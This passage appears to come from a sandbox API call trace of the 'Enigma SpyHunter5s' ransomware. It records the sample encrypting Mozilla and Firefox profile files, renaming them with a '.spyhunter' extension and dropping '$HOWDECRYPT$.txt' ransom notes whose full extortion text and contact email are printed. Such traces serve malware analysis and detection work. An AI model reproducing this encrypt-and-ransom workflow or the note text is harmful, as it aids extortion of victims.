(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.327] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecf4*=0x2ac, lpOverlapped=0x0) returned 1 [0153.327] CloseHandle (hObject=0xb0) returned 1 [0153.327] GetProcessHeap () returned 0x2c0000 [0153.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2baa0 | out: hHeap=0x2c0000) returned 1 [0153.328] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec90 | out: pbBuffer=0x57ec90) returned 1 [0153.328] GetProcessHeap () returned 0x2c0000 [0153.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.328] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec88*=0x30) returned 1 [0153.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.328] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0153.328] StrStrW (lpFirst="updates.xml", lpSrch=".txt") returned 0x0 [0153.328] GetProcessHeap () returned 0x2c0000 [0153.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.328] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec4c*=0x39, lpOverlapped=0x0) returned 1 [0153.329] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.330] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x57ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec4c*=0x39, lpOverlapped=0x0) returned 1 [0153.330] GetProcessHeap () returned 0x2c0000 [0153.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.330] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.330] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec4c, lpOverlapped=0x0 | out: lpBuffer=0x57ec8c*, lpNumberOfBytesWritten=0x57ec4c*=0x4, lpOverlapped=0x0) returned 1 [0153.330] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec4c*=0x30, lpOverlapped=0x0) returned 1 [0153.330] CloseHandle (hObject=0xb0) returned 1 [0153.330] GetProcessHeap () returned 0x2c0000 [0153.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.330] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.spyhunter") returned 102 [0153.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.spyhunter")) returned 1 [0153.331] GetProcessHeap () returned 0x2c0000 [0153.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.331] GetProcessHeap () returned 0x2c0000 [0153.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.331] GetProcessHeap () returned 0x2c0000 [0153.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61408 | out: hHeap=0x2c0000) returned 1 [0153.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.332] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.332] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebc3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x57ebc3*, lpNumberOfBytesWritten=0x57ecec*=0x127, lpOverlapped=0x0) returned 1 [0153.333] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.333] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecec*=0x2ac, lpOverlapped=0x0) returned 1 [0153.333] CloseHandle (hObject=0xb0) returned 1 [0153.333] GetProcessHeap () returned 0x2c0000 [0153.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbff28 | out: hHeap=0x2c0000) returned 1 [0153.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.334] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.334] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ece8, lpOverlapped=0x0 | out: lpBuffer=0x57ebbf*, lpNumberOfBytesWritten=0x57ece8*=0x127, lpOverlapped=0x0) returned 1 [0153.335] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.335] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ece8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ece8*=0x2ac, lpOverlapped=0x0) returned 1 [0153.335] CloseHandle (hObject=0xb0) returned 1 [0153.335] GetProcessHeap () returned 0x2c0000 [0153.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbfe00 | out: hHeap=0x2c0000) returned 1 [0153.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec88 | out: pbBuffer=0x57ec88) returned 1 [0153.335] GetProcessHeap () returned 0x2c0000 [0153.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.335] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec80*=0x30) returned 1 [0153.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0153.341] StrStrW (lpFirst="update.status", lpSrch=".txt") returned 0x0 [0153.341] GetProcessHeap () returned 0x2c0000 [0153.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.341] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec44*=0xc, lpOverlapped=0x0) returned 1 [0153.342] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.342] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x57ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec44*=0xc, lpOverlapped=0x0) returned 1 [0153.342] GetProcessHeap () returned 0x2c0000 [0153.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.342] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.342] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec44, lpOverlapped=0x0 | out: lpBuffer=0x57ec84*, lpNumberOfBytesWritten=0x57ec44*=0x4, lpOverlapped=0x0) returned 1 [0153.342] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec44*=0x30, lpOverlapped=0x0) returned 1 [0153.342] CloseHandle (hObject=0xb0) returned 1 [0153.342] GetProcessHeap () returned 0x2c0000 [0153.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.342] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.spyhunter") returned 114 [0153.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.spyhunter")) returned 1 [0153.343] GetProcessHeap () returned 0x2c0000 [0153.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.343] GetProcessHeap () returned 0x2c0000 [0153.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.343] GetProcessHeap () returned 0x2c0000 [0153.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbfcd8 | out: hHeap=0x2c0000) returned 1 [0153.343] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec80 | out: pbBuffer=0x57ec80) returned 1 [0153.343] GetProcessHeap () returned 0x2c0000 [0153.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.344] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec78*=0x30) returned 1 [0153.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0153.345] StrStrW (lpFirst="active-update.xml", lpSrch=".txt") returned 0x0 [0153.345] GetProcessHeap () returned 0x2c0000 [0153.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.345] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec3c*=0x464, lpOverlapped=0x0) returned 1 [0153.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.567] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x57ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec3c*=0x464, lpOverlapped=0x0) returned 1 [0153.567] GetProcessHeap () returned 0x2c0000 [0153.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.567] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec3c, lpOverlapped=0x0 | out: lpBuffer=0x57ec7c*, lpNumberOfBytesWritten=0x57ec3c*=0x4, lpOverlapped=0x0) returned 1 [0153.567] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec3c*=0x30, lpOverlapped=0x0) returned 1 [0153.567] CloseHandle (hObject=0xb0) returned 1 [0153.567] GetProcessHeap () returned 0x2c0000 [0153.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.568] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.spyhunter") returned 108 [0153.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.spyhunter")) returned 1 [0153.568] GetProcessHeap () returned 0x2c0000 [0153.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.569] GetProcessHeap () returned 0x2c0000 [0153.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.569] GetProcessHeap () returned 0x2c0000 [0153.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b988 | out: hHeap=0x2c0000) returned 1 [0153.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.569] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.569] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebb3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x57ebb3*, lpNumberOfBytesWritten=0x57ecdc*=0x127, lpOverlapped=0x0) returned 1 [0153.570] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.570] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecdc*=0x2ac, lpOverlapped=0x0) returned 1 [0153.570] CloseHandle (hObject=0xb0) returned 1 [0153.571] GetProcessHeap () returned 0x2c0000 [0153.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8deb8 | out: hHeap=0x2c0000) returned 1 [0153.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.571] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.571] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecd8, lpOverlapped=0x0 | out: lpBuffer=0x57ebaf*, lpNumberOfBytesWritten=0x57ecd8*=0x127, lpOverlapped=0x0) returned 1 [0153.572] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.572] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecd8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecd8*=0x2ac, lpOverlapped=0x0) returned 1 [0153.572] CloseHandle (hObject=0xb0) returned 1 [0153.572] GetProcessHeap () returned 0x2c0000 [0153.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45d28 | out: hHeap=0x2c0000) returned 1 [0153.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.573] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your 